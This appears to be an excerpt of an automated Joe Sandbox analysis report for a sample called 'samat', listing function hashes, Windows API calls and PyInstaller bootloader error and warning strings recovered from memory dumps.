                                                                                                                                                                                                                                                                                      • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                                                                      • Instruction ID: b80047ece2a6c09095f5d7f99eb1595d97a9f815f1859d40cf0a1c13094bcf88
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3AD1A272B0874186EB20AF25D8423ADBBA8FB44798F900136DF4D57795DF78E180C752
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7E12C3706,?,00007FF7E12C3804), ref: 00007FF7E12C2C9E
                                                                                                                                                                                                                                                                                      • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7E12C3706,?,00007FF7E12C3804), ref: 00007FF7E12C2D63
                                                                                                                                                                                                                                                                                      • MessageBoxW.USER32 ref: 00007FF7E12C2D99
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                                                                      • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                                                      • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                                                                      • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                                                                      • Instruction ID: 187e43ec799e49da231e51653b2d225c75f837ad1fbaf07bc2a2c70cfe28270d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4531F622B08A4142E721BB25BC113ABA699BF88B98F814137EF4D93759DF7CD516C311
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF7E12CDF7A,?,?,?,00007FF7E12CDC6C,?,?,?,00007FF7E12CD869), ref: 00007FF7E12CDD4D
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF7E12CDF7A,?,?,?,00007FF7E12CDC6C,?,?,?,00007FF7E12CD869), ref: 00007FF7E12CDD5B
                                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF7E12CDF7A,?,?,?,00007FF7E12CDC6C,?,?,?,00007FF7E12CD869), ref: 00007FF7E12CDD85
                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF7E12CDF7A,?,?,?,00007FF7E12CDC6C,?,?,?,00007FF7E12CD869), ref: 00007FF7E12CDDF3
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF7E12CDF7A,?,?,?,00007FF7E12CDC6C,?,?,?,00007FF7E12CD869), ref: 00007FF7E12CDDFF
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                                                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                                                      • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                                                                      • Instruction ID: de88a2c629d611537c078454b295b9c253d13256b400c749d567abecc1f2cb6a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8F31C522F1A60692EF12AB029C02775A39CFF48BA4FD94537DE1D56384DFBCE444C261
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                      • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                                                                      • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                                                                      • Opcode ID: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                                                                                                                                                                                                                      • Instruction ID: fab8920e11336db158a54e81db28b503af548b9439bab134c325a0d5914dcd32
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41418121B18A8691EB25EB20EC163EAA319FF44340FC04133EB5D43695EFBCE515C362
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF7E12C351A,?,00000000,00007FF7E12C3F23), ref: 00007FF7E12C2AA0
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                      • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                                                                      • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                                                                      • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                                                                      • Instruction ID: e87a00a17ac7ee17782615e2d05f2ad3334025735a3d0b5fada15cdec6019ce9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86219F32B1878186E721AB55B8427E6A298BB88380F800137FE8D93659DFBCD255C751
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2506987500-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 12f476f87c8743e70c8b210e20a22f1b01636e2fed05d2f1e0a082253e023e8e
                                                                                                                                                                                                                                                                                      • Instruction ID: cbe752d339cda4b514402ae2a68cbe1883052c87cb2be649235c8fd76e151e2b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 12f476f87c8743e70c8b210e20a22f1b01636e2fed05d2f1e0a082253e023e8e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 76216D22B0C24242FB657332DD6737DD14A6F497A0F804636D83E47ACADEBDE4118326
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                                                      • String ID: CONOUT$
                                                                                                                                                                                                                                                                                      • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                                                      • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                                                                      • Instruction ID: bfea000aa6e60dccb14b08a83649aad203dbd2a48a814ffa7f3037fccc8b588b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F11B131B18A4182E751AB52EC46329A2A8FB88BF4F844236EA5DC7794CFBCD8108751
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF7E12C3FB1), ref: 00007FF7E12C8EFD
                                                                                                                                                                                                                                                                                      • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF7E12C3FB1), ref: 00007FF7E12C8F5A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12C9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7E12C45F4,00000000,00007FF7E12C1985), ref: 00007FF7E12C93C9
                                                                                                                                                                                                                                                                                      • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF7E12C3FB1), ref: 00007FF7E12C8FE5
                                                                                                                                                                                                                                                                                      • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF7E12C3FB1), ref: 00007FF7E12C9044
                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF7E12C3FB1), ref: 00007FF7E12C9055
                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF7E12C3FB1), ref: 00007FF7E12C906A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3462794448-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                                                                                                                                                                                                                                                      • Instruction ID: 32fed1b1886a366e95b6ad5dbc68e2d71c9ae68cfe8699d04e55929775e055ee
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5141D762B1968281EF30AB11A8013BAB398FF85BD4F854136DF4E57789DEBDD501C721
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF7E12D4F11,?,?,?,?,00007FF7E12DA48A,?,?,?,?,00007FF7E12D718F), ref: 00007FF7E12DB2D7
                                                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7E12D4F11,?,?,?,?,00007FF7E12DA48A,?,?,?,?,00007FF7E12D718F), ref: 00007FF7E12DB30D
                                                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7E12D4F11,?,?,?,?,00007FF7E12DA48A,?,?,?,?,00007FF7E12D718F), ref: 00007FF7E12DB33A
                                                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7E12D4F11,?,?,?,?,00007FF7E12DA48A,?,?,?,?,00007FF7E12D718F), ref: 00007FF7E12DB34B
                                                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7E12D4F11,?,?,?,?,00007FF7E12DA48A,?,?,?,?,00007FF7E12D718F), ref: 00007FF7E12DB35C
                                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(?,?,?,00007FF7E12D4F11,?,?,?,?,00007FF7E12DA48A,?,?,?,?,00007FF7E12D718F), ref: 00007FF7E12DB377
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2506987500-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 341ed06667cf8b6c5416a7ef0c6dfdccbf195f5bc763a811adde1679d5f4f530
                                                                                                                                                                                                                                                                                      • Instruction ID: c2785f4d0c6c6e77735e094ba26bb851b6f48a53924aa4012a7835b23b76f85b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 341ed06667cf8b6c5416a7ef0c6dfdccbf195f5bc763a811adde1679d5f4f530
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F118E22B0C64282FB957721DD5337D914AAF497B0F804736DC2E477D6DEBDA4114322
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7E12C1B6A), ref: 00007FF7E12C295E
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                      • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                                                      • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                                                                      • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                                                                      • Instruction ID: 54c640665c14ceb6c072caddbdcc2b4df747597f7b34f72176d4332f90c746b2
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E31E222B1868156E721B765AC423E7A299BF887D4F804133FE8D93759EFBCD146C321
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                                                                      • String ID: Unhandled exception in script
                                                                                                                                                                                                                                                                                      • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                                                                      • Opcode ID: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                                                                                                                                                                                                      • Instruction ID: aa0dff722b30b4cfb83da9bd7c0b966bfee5cc2ab23a599afea3be46d430aeed
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE315222B19A8249EB21EB21EC562F9A364FF88788F844137EA4D47B59DF7CD105C712
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF7E12C918F,?,00007FF7E12C3C55), ref: 00007FF7E12C2BA0
                                                                                                                                                                                                                                                                                      • MessageBoxW.USER32 ref: 00007FF7E12C2C2A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                                                                      • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                                                                      • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                                                                      • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                                                                      • Instruction ID: 61fa9ac32d8e62258f04e4c59ce8d764f5ec8c28df1fdfa070871f73a747d3e8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7A21B262B08B4182E711AB14F8467EAB3A8FB88780F804137EE8D97759DF7CD215C751
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF7E12C1B99), ref: 00007FF7E12C2760
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                      • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                                                                      • API String ID: 2050909247-1591803126
